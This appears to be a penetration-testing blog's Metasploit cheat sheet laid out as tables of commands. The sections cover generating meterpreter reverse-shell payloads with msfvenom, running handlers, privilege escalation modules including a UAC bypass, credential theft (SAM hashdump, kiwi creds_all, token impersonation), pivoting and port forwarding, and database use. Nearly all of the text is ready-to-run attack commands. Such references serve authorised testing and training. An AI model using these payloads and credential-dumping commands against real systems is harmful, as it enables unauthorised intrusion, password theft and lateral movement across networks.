The Metasploit Framework is an open-source penetration testing and ethical hacking tool developed by Rapid7. It provides a number of tools to exploit vulnerabilities in computer systems, networks, and applications.
Below are some useful Metasploit commands.
MSFVenom Commands
MSFVenom can be used to generate payloads which are compatible with Metasploit.
| Task | How | Notes |
|---|---|---|
| List MSFVenom payloads | msfvenom –list payloads | Shows supported payloads. Stageless payloads are designated with an underscore i.e windows/shell_reverse_tcp |
| Generate a Windows payload | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f exe > shell-win-x64.exe | Making sure the payload matches the target architecture is preferred. If a 32 bit payload is executed on a 64-bit host, you will need to migrate to a x64 process before extracting hashes. |
| Generate a Linux Payload | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f elf > shell-lin-x64 |
Session Management
The following command can be used to manage sessions.
| Task | How | Notes |
|---|---|---|
| Start a handler | use exploit/multi/handler set LHOST 172.23.168.66 set LPORT 6666 set ExitOnSession FALSE set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit -jz | LHOST can be set as an interface ID, such as eth0. ExitOnSession FALSE ensures the listener stays active after an initial shell. exploit -jz runs the listener as a background task. |
| Process Migration | post/windows/manage/migrate | Useful for stability, and to migrate from 32 to 64 bit processes. |
| Session management | sessions -i sessions -b sessions -u | -i interacts with a sessions -b places a session in the background -u upgrades a standard reverse shell to a Meterpreter shell |
| Channel management | channel -i channel -l | -i interacts with a channel -l lists available channels |
| Jobs | jobs -l jobs -k | Jobs are background tasks. They can be viewed with jobs -l, and killed with jobs -k |
Privilege Escalation
Some useful modules for common privilege escalation tasks. The following article provides more information on using these modules;
https://www.bordergate.co.uk/windows-privilege-escalation/
| Task | How | Notes |
|---|---|---|
| Enumerate privileges | getprivs | Will show the currently active user privileges. |
| Exploit weak service permissions | use exploit/windows/local/service_permissions | |
| Exploited unquoted service paths | exploit/windows/local/unquoted_service_path | |
| Search for vulnerabilities that may lead to privilege escalation | post/multi/recon/local_exploit_suggester | |
| Enumerate installed applications | post/windows/gather/enum_applications | |
| Exploit systems that have AlwaysInstallElevated set | exploit/windows/local/always_install_elevated | |
| Bypass UAC | exploit/windows/local/bypassuac | |
| Enumerate local AV Exclusions | post/windows/gather/enum_av_excluded |
Credentials
Commands for extracting credentials. There are a lot of additional application specific modules under post/windows/gather/credentials/.
| Task | How | Notes |
|---|---|---|
| Dump SAM database | As an administrative user: getsystem hashdump | Hashes can be cracked, or used for pass the hash attacks. |
| Extract other credentials | load kiwi creds_all | May include plaintext credentials on older versions of Windows. |
| User Impersonation | load incognito list_tokens -u impersonate bordergate.local\Administrator getuid | Use rev2self to revert to previous user context. |
| Extract Unattend.xml credentials | use post/windows/gather/enum_unattend | |
| Search for credentials | search -f *.ppk | Example looks for putty key files. |
| Group Policy Preference file extraction | post/windows/gather/credentials/gpp | For a domain connected system. |
Pivoting
The following commands are useful at identifying other hosts and networks that can be attacked.
| Task | How | Guidance |
|---|---|---|
| Add routes | run autoroute -s 192.168.19.0/24 | Use “run autoroute -p” to view active routes. |
| Configure a SOCKS proxy | use auxiliary/server/socks_proxy set VERSION 4a set SRVPORT 9050 run | This should match the values you have configured in /etc/proxychains4.conf. To use the proxy: proxychains -q nmap -Pn -n -F -sT 192.168.1.1 |
| Port forward to destination | meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1 | Forwards port 8080 on Kali system to port 80 on 192.168.1.1. |
| Ping sweep | use multi/gather/ping_sweep set RHOSTS 192.168.1.0/24 set SESSION 1 run | A quick way of mapping new subnets. |
| ARP Scan | run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 | ARP Scan local subnet. |
| Review Network Configuration | ipconfig netstat | Looking for active connections which may indicate trust relationships between hosts. Review previously unidentified subnets. |
| Portscan (via Pivot) | use auxiliary/scanner/portscan/tcp | Make sure routes are added with autoroute before hand. |
| Reverse DNS Lookup | multi/gather/dns_reverse_lookup | Useful for finding new routed targets. |
Metasploit Database
The database can be used to store scan results, credentials and loot.
| Task | How | Guidance |
|---|---|---|
| Initialise the database | systemctl start postgresql sudo msfdb init msf6 > db_status | Required to start using Metasploit database functionality |
| Configure a workspace | Add a new workspace: workspace -a myworkspace List workspaces: workspace Change workspaces: workspace | Workspaces provide separation between data in separate tests |
| Nmap scanning | db_nmap -sV -A | Scan using standard Nmap arguments and store the results in the postgres database. |
| List database contents | hosts services | For listed hosts and service respectively. |
| Export database contents | services -o /tmp/services.txt hosts -o /tmp/hosts.txt | Export hosts or services to a text file. |
| Set RHOSTS | services -p 445 -R | The example command will set RHOSTS for any systems with port 445 open. This is very useful when combined with RC scripts. |
Scripting
| Task | How | Guidance |
|---|---|---|
| Save commands | makerc /tmp/commands.rc | Saves executed commands to a file. |
| Execute saved commands | msfconsole -r /tmp/commands.rc | Runs save commands. |
Search Commands
Without filtering, searching for generic terms often results in way too many results. Using search filters reduces the amount of output returned.
| Task | How | Guidance |
|---|---|---|
| Search for exploits only | search type:exploit name:tomcat | Type could be exploit,post,auxiliary |
| Search by platform | search platform:windows name:gather | |
| Remove unwanted results | grep -v DoS grep -v local search type:exploit name:tomcat | The grep needs to be placed before the search command. |